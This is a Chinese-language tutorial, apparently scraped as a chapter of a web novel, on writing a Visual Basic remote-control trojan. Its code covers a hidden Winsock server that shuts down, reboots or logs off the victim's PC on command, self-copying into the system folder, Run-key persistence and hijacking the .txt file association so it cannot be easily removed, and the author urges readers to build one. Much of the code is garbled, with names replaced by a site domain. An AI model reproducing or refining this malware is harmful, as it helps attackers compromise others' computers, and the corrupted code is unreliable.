利用vb实现木马攻击

利用vb实现木马攻击

首先,新建一工程,名为server,新建一个窗体,name为server,在窗体中加入一个winsock控件,name设为sckserver,协议设为默认的tcp/ip协议。

接下来我们回来server窗体模块中,添加如下代码:

privatesubform_load

with

.bxwx.org=88917'本地端口(呵呵!我的生日!)

.bxwx.org'开始监听

endwith

endsub

'接受客户端的连接请求。

privatesubsckserver_connectionrequest(byvalrequestidlong)

with

.bxwx.orgbxwx.org

.bxwx.org(requestid)

endwith

endsub

下面我们来建立客户端程序:新建一个工程,名为client,把窗体名为client,在上面加入一个winsock控件,名为sckclient,协议为tcp/ip协议。再加一个按钮cmdconnect在窗体模块中加入代码:

privatesubform_load

with

.bxwx.org="127.0.0.1"'设置远程ip,本例设为本机。

.bxwx.org=88917'远程端口,就为server中的设置一样.

endwith

endsub

privatesubcmdconnect_clicbxwx.org

endsub

至此,单击connect按钮我们的两个工程已经可以进行通信了,但看不见,你可以在client中的sckclient_connect事件中加入代码:bxwx.org“conorgionsuccessful!”来查看。

这仅是第一步,一点工作也做不了,下面我们来为它们添加功能。为了简单,本文章只实现一点小小的功能―――关机,重启,注销。好,开始吧!

在server工程中新建一个模块,name为modapi,这个模快为一些api函数,添加如下api函数:

publicdeclarefunctionexitwindowxxxlib"user32"alias"exitwindowxxx"(byvaluflagslong,byvaldwreservedlong)long

publicconstewx_logoff=0

publicconstewx_reboot=2

publicconstewx_shutdown=1

publicdeclarefunctionclipcursorlib"user32"alias"clipcursor"(lprectany)long

publictyperect

leftlong

toplong

rightlong

bottomlong

endtype

注:在两个socket中编程中,进行通信的重要事件是dataarrival事件,用于接收远程数据。

下面在client工程的client窗体中放入三个按钮,分别为cmdexit,cmdlogoff,cmdreboot。它们用于对远程的关机,注销,重启操作。分别添加如下代码:

privatesubcmdexit_click

me.bxwx.org"exit"

endsub

privatesubcmdlogoff_click

me.bxwx.org"logoff"

endsub

privatesubcmdreboot_click

me.bxwx.org"reboot"

endsub

全都是对服务端发出请求。下面转到server工程中:在server中添加sckserver的dataarrial事件,接收客户端的请求。

privatesubsckserver_dataarrival(byvalbytestotallong)

dimstrdatastring

with

'接收客户请求的信息

.bxwx.orgstrdata

selectcasestrdata

case"exit"

'关机

callexitwindowxxx(ewx_shutdown,0)

case"reboot"

'重启

callexitwindowxxx(ewx_reboot,0)

case"logoff"

'注销

callexitwindowxxx(ewx_logoff,0)

endselect

endwith

endsub

好了,到此我们已经实现功能了,但还不行,我们要它在背后运行。这简单,在server中的form_load事件中加入一句:me.hide。好这下看不见了,但大家知道木马是一开机就自动运行了,这又是为什么,怎么实现的?把它加入到注册表的启动组中?对,不错,跟我来吧!

回到server工程中的modapi中加入如下api函数:

publicdeclarefunctionregopenkeylib"bxwx.org"alias"regopenkeya"(byvalhkeylong,byvallpsubkeystring,phkresultlong)long

publicdeclarefunctionregsetvalueexlib"bxwx.org"alias"regsetvalueexa"(byvalhkeylong,byvallpvaluenamestring,byvalreservedlong,byvaldwtypelong,lpdataany,byvalcbdatalong)long

publicdeclarefunctionregcreatekeylib"bxwx.org"alias"regcreatekeya"(byvalhkeylong,byvallpsubkeystring,phkresultlong)long

publicconstreg_binary=3

publicconstreg_sz=1

publicconsthkey_local_machine=&h80000002

publicconsthkey_classes_root=&h80000000

写到注册表启动组中的过程。

publicsubstartupgroup

dimskeystring

dimresultlong

dimhkeyidlong

dimskeyvalstring

skey="systrsy"'启动组中的键,找一个与系统文件相近的。

skeyval="c:/windows/system/bxwx.org"'木马文件的路径,可以用getsystemdirectory来取得系统路径。

result=regopenkey(hkey_local_machine,_

"software/microsoft/windows/currentversion/run",hkeyid)

result=0then

result=regsetvalueex(hkeyid,skey,0&,reg_sz,skeyval,len(skey)+1)

end

endsub

好,就这样简单地完成了。但是,想过没有,如果不是很菜的鸟,到注册表中见一删,我们苦苦的心血不就白白地浪费了吗?不行,还得想让他发现了删也删不掉。请看下面的代码:

publicsubwritetotxt

dimresultlong

dimhkeyidlong

dimskeystring

dimskeyvalstring

skey="txtfile/shell/open/orgmand"

skeyval="c:/windows/system/bxwx.org"

result=regopenkey(hkey_classes_root,skeyval,hkeyid)

result=0then

result=regsetvalueex(hkeyid,skey,0&,reg_sz,skeyval,len(skeyval)+1)

end

endsub

肯定不少朋友一看就知道了,原是与txt文件进行关联,一点也不错,但c:/windows/system/bxwx.org是哪里来的,我们的木马是c:/windows/system/bxwx.org呀。这可是我们木马的分身了。

好,回到server工程的server窗体的form_load中,加入如下代码:

dimscurrentpathstring,ssystemdirstring

scurrentpath=app.path&"/"&app.exename&".exe"

ssystemdir=“c:/windows/system”

errorresumenext

'复制文件成系统目录下的bxwx.org

filecopyscurrentpath,ssystemdir&"/bxwx.org"

errorresumenext

复制文件成系统目录下的bxwx.org

filecopyscurrentpath,ssystemdir&"/bxwx.org"

调用

callstartupgroup

callwritetotxt

'判断程序是否下在运行

bxwx.orgthen

'如果已经运行就退出。

end

end

好了,写到这里一个破坏性木马已经诞生了,我实验过还是比较好的一个,希望大家也能写一个好的木马,能突破冰河(呵呵!)

注意:

1、大家在处理端口是最好使用高端端口,否则会和一些常用端口发生冲突

2、在第一次使用vb.org的最好看看有关的图书,可能你能写出一款超级木马也说不定

上一章书籍页下一章

super红客

···
加入書架
上一章
首頁 都市青春 super红客
上一章下一章

利用vb实现木马攻击

%